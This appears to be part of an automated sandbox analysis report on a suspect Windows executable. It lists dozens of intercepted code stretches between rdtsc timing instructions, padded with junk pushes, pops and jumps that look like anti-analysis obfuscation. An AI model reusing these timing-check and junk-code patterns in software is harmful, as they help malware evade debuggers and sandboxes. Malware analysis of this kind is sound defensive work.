                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7904E3 second address: 790535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F402CC7E516h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F402CC7E511h 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 jmp 00007F402CC7E519h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790535 second address: 790539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790539 second address: 790548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ebx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790746 second address: 79074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79074A second address: 790750 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790750 second address: 790756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790B02 second address: 790B69 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F402CC7E508h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e and ecx, dword ptr [ebp+122D1B14h] 0x00000034 push 0000001Eh 0x00000036 sbb cl, 00000061h 0x00000039 nop 0x0000003a pushad 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e jbe 00007F402CC7E506h 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F402CC7E518h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790B69 second address: 790B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F402CDD4F71h 0x0000000e pushad 0x0000000f jmp 00007F402CDD4F63h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790F2D second address: 790F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C589C second address: 7C58B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C58B7 second address: 7C58BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5CA4 second address: 7C5CD8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edx 0x00000008 jbe 00007F402CDD4F68h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F402CDD4F5Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5DF7 second address: 7C5E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop edi 0x0000000b je 00007F402CC7E54Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5E0C second address: 7C5E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5E10 second address: 7C5E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F402CC7E519h 0x0000000f jmp 00007F402CC7E50Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5FA9 second address: 7C5FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F402CDD4F5Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 pushad 0x00000013 jnp 00007F402CDD4F5Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBDB2 second address: 7CBDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74659F second address: 7465AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7465AA second address: 7465CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jnc 00007F402CC7E511h 0x00000010 push ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7465CA second address: 7465D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CACBA second address: 7CACBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CACBE second address: 7CACC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAF9B second address: 7CAFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F402CC7E506h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAFA6 second address: 7CAFAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAFAD second address: 7CAFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAFB8 second address: 7CAFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB7E6 second address: 7CB826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F402CC7E511h 0x0000000f push edi 0x00000010 pop edi 0x00000011 js 00007F402CC7E506h 0x00000017 popad 0x00000018 jp 00007F402CC7E508h 0x0000001e popad 0x0000001f pushad 0x00000020 js 00007F402CC7E50Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC27 second address: 7CBC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC2F second address: 7CBC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F402CC7E506h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC44 second address: 7CBC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5F9F second address: 7D5FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5FA4 second address: 7D5FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F402CDD4F56h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4C63 second address: 7D4C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D595E second address: 7D597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F402CDD4F56h 0x0000000a jmp 00007F402CDD4F62h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D597E second address: 7D599A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F402CC7E506h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F402CC7E50Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D599A second address: 7D59A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5C6A second address: 7D5C70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7F4B second address: 7D7F5B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F402CDD4F56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7F5B second address: 7D7F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB23D second address: 7DB241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB241 second address: 7DB277 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F402CC7E508h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F402CC7E50Fh 0x00000013 pushad 0x00000014 jmp 00007F402CC7E516h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DADFA second address: 7DAE06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F402CDD4F56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAE06 second address: 7DAE29 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jp 00007F402CC7E513h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAF8E second address: 7DAF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DAF92 second address: 7DAFA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F402CC7E50Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E08AF second address: 7E08D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F402CDD4F63h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E08D0 second address: 7E08D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E08D4 second address: 7E08D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E08D8 second address: 7E08F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E513h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790954 second address: 79099D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push ecx 0x00000009 or dword ptr [ebp+122D1911h], eax 0x0000000f pop edx 0x00000010 mov ebx, dword ptr [ebp+12481ACCh] 0x00000016 mov edx, dword ptr [ebp+122D2A0Fh] 0x0000001c add eax, ebx 0x0000001e cld 0x0000001f nop 0x00000020 pushad 0x00000021 jnp 00007F402CDD4F58h 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a jmp 00007F402CDD4F66h 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79099D second address: 7909CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F402CC7E508h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f call 00007F402CC7E512h 0x00000014 mov edi, dword ptr [ebp+122D2983h] 0x0000001a pop ecx 0x0000001b push 00000004h 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7909CD second address: 7909E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7909E3 second address: 7909E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0B7E second address: 7E0B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0B89 second address: 7E0B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E49A1 second address: 7E49A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E49A6 second address: 7E49AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E42DE second address: 7E42E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E472B second address: 7E4748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E513h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4748 second address: 7E474C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7AE4 second address: 7E7AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7AEA second address: 7E7B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F402CDD4F5Eh 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F402CDD4F56h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7C42 second address: 7E7C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7EC7 second address: 7E7ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7ECB second address: 7E7ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E80BC second address: 7E80C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E80C0 second address: 7E80C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E83CA second address: 7E83CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0D7D second address: 7F0D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEEF2 second address: 7EEF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F402CDD4F5Bh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEF0B second address: 7EEF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEF0F second address: 7EEF31 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F402CDD4F56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F402CDD4F63h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F402CDD4F5Bh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF07D second address: 7EF0A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F402CC7E50Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF0A6 second address: 7EF0BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F402CDD4F62h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF3B1 second address: 7EF3DE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F402CC7E517h 0x00000011 jmp 00007F402CC7E50Ah 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFC52 second address: 7EFC6F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F402CDD4F67h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFC6F second address: 7EFC9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CC7E50Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F402CC7E508h 0x00000010 jmp 00007F402CC7E50Ch 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFF91 second address: 7EFFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F402CDD4F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F402CDD4F5Ch 0x00000011 jmp 00007F402CDD4F60h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFFB9 second address: 7EFFBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0798 second address: 7F079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0A84 second address: 7F0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2387 second address: 7F238D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752101 second address: 75210D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F402CC7E506h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75210D second address: 752113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA985 second address: 7FA98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA98B second address: 7FA9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CDD4F66h 0x00000009 popad 0x0000000a jmp 00007F402CDD4F5Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA9B5 second address: 7FA9C8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F402CC7E50Eh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAB47 second address: 7FAB68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAE9D second address: 7FAEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAEA2 second address: 7FAEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAEA8 second address: 7FAEAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB01D second address: 7FB027 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB027 second address: 7FB02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
